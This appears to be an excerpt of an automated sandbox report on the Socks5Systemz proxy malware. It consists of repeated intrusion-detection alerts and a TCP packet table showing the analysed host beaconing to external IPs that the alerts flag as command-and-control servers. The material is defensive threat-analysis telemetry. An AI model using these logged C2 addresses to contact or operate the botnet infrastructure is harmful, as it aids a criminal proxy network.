                                                                                                    2024-10-03T08:40:47.354128+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549757185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:48.187718+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549758185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:49.043864+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549759185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:49.396093+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549759185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:50.227981+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549760185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:51.027289+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549761185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:51.381067+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549761185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:52.430482+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549764185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:53.253641+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549765185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:54.075772+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549766185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:54.886719+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549767185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:55.242928+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549767185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:56.045580+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549768185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:56.394950+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549768185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:57.227686+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549769185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:58.064857+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549772185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:59.087367+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549773185.208.158.24880TCP
                                                                                                    2024-10-03T08:40:59.934414+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549774185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:00.787445+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549775185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:01.898165+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549776185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:02.736191+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549777185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:03.596214+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549778185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:04.426341+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549779185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:05.350713+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549780185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:07.092511+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549781185.208.158.24880TCP
                                                                                                    2024-10-03T08:41:07.965780+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549782185.208.158.24880TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 3, 2024 08:39:57.298666954 CEST4971180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:57.303957939 CEST8049711185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:39:57.304050922 CEST4971180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:57.304194927 CEST4971180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:57.309710026 CEST8049711185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:39:57.996258020 CEST8049711185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:39:57.996325016 CEST4971180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:58.177089930 CEST4971180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:58.181230068 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:58.182334900 CEST8049711185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:39:58.182415009 CEST4971180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:58.186148882 CEST8049712185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:39:58.186230898 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:58.200680017 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:58.205516100 CEST8049712185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:39:58.879477024 CEST8049712185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:39:58.879561901 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:39:58.880470037 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:39:58.885310888 CEST20234971489.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:39:58.885400057 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:39:58.885431051 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:39:58.890311956 CEST20234971489.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:39:58.890374899 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:39:58.895153046 CEST20234971489.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:39:59.494227886 CEST20234971489.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:39:59.540762901 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:01.512636900 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:01.517575979 CEST8049712185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:01.788605928 CEST8049712185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:01.788815975 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:01.904004097 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:01.904375076 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:01.909265041 CEST8049715185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:01.909426928 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:01.909507036 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:01.909580946 CEST8049712185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:01.909677029 CEST4971280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:01.914351940 CEST8049715185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:02.619884014 CEST8049715185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:02.620011091 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:02.620896101 CEST497162023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:02.625998020 CEST20234971689.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:02.626116991 CEST497162023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:02.626159906 CEST497162023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:02.626209021 CEST497162023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:02.730813026 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:02.863692045 CEST20234971689.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:02.865030050 CEST8049715185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:02.903318882 CEST20234971689.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:03.096632004 CEST8049715185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:03.096771002 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:03.216275930 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:03.216742992 CEST4971780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:03.221601009 CEST8049715185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:03.221621037 CEST8049717185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:03.221760035 CEST4971780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:03.222007036 CEST4971780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:03.222016096 CEST4971580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:03.226850986 CEST8049717185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:03.290044069 CEST20234971689.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:03.290169954 CEST497162023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:03.912508011 CEST8049717185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:03.912592888 CEST4971780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.136853933 CEST4971780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.142277002 CEST8049717185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:04.142364025 CEST4971780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.142419100 CEST4971880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.147305965 CEST8049718185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:04.147394896 CEST4971880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.148631096 CEST4971880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.153491974 CEST8049718185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:04.832319975 CEST8049718185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:04.832385063 CEST4971880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.949517012 CEST4971880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.949896097 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.954643965 CEST8049718185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:04.954737902 CEST8049719185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:04.954756975 CEST4971880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.954829931 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.955013037 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:04.962806940 CEST8049719185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:05.669584036 CEST8049719185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:05.669677019 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:05.777793884 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:05.782747984 CEST8049719185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.018551111 CEST8049719185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.018610001 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.136887074 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.137259007 CEST4972080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.142250061 CEST8049720185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.142268896 CEST8049719185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.142338037 CEST4972080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.142364025 CEST4971980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.142477989 CEST4972080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.147222042 CEST8049720185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.831357956 CEST8049720185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.831496954 CEST4972080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.950143099 CEST4972080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.955332041 CEST8049720185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.956994057 CEST4972080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.960907936 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.965789080 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:06.965984106 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.966164112 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:06.970930099 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.481785059 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.481849909 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.484606028 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.484657049 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.486325979 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.486372948 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.590416908 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.595355034 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.830358028 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.830451965 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.949470997 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.949847937 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.954657078 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.954683065 CEST8049721185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:08.954737902 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.954771042 CEST4972180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.954951048 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:08.959722996 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.645920992 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.645984888 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.762022018 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.762362003 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.767218113 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.767236948 CEST8049722185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:09.767357111 CEST4972280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.767479897 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.767479897 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:09.772250891 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.454655886 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.454749107 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.574171066 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.574527025 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.579529047 CEST8049723185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.579549074 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:10.579622984 CEST4972380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.579647064 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.579782963 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:10.584629059 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.274789095 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.275120020 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.387032986 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.391966105 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.624023914 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.624285936 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.730504990 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:11.735574961 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.967400074 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:11.967612982 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.082320929 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.087251902 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.328104973 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.328222036 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.449528933 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.449938059 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.454757929 CEST8049724185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.454792976 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:12.454931974 CEST4972480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.454991102 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.455183029 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:12.460171938 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668616056 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668705940 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.668803930 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668863058 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.668948889 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:13.668989897 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.778165102 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:13.783169985 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.019181013 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.019252062 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.137742996 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.138145924 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.143264055 CEST8049725185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.143347979 CEST4972580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.143433094 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.143506050 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.143680096 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.148468018 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.838619947 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.838728905 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.965122938 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.965531111 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.970313072 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.970429897 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.970506907 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.970963001 CEST8049726185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:14.971015930 CEST4972680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:14.975256920 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.663813114 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.663948059 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.778233051 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.778598070 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.783540010 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.783612967 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.783653021 CEST8049727185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:15.783700943 CEST4972780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.783762932 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:15.788598061 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.468743086 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.468812943 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.590228081 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.590631008 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.595530987 CEST8049728185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.595562935 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:16.595612049 CEST4972880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.595673084 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.595844984 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:16.600610971 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.286511898 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.286664963 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.403004885 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.403389931 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.408138990 CEST8049729185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.408217907 CEST4972980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.408293962 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:17.408360004 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.408485889 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:17.413253069 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.087939978 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.088016987 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.199320078 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.204370975 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.438894033 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.439018965 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.558984041 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.559343100 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.564222097 CEST8049730185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.564248085 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:18.564344883 CEST4973080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.564426899 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.564563990 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:18.569331884 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.251231909 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.251332045 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.371915102 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.372356892 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.377082109 CEST8049731185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.377108097 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:19.377135038 CEST4973180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.377171040 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.377352953 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:19.382122993 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.057390928 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.057528019 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.168422937 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.173327923 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.409823895 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.409919977 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.530644894 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.531263113 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.535841942 CEST8049732185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.535897970 CEST4973280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.536178112 CEST8049733185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:20.536245108 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.536375999 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:20.541132927 CEST8049733185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:21.226202011 CEST8049733185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:21.226324081 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.340394974 CEST4973380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.340809107 CEST4973480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:21.345733881 CEST8049734185.208.158.248192.168.2.5
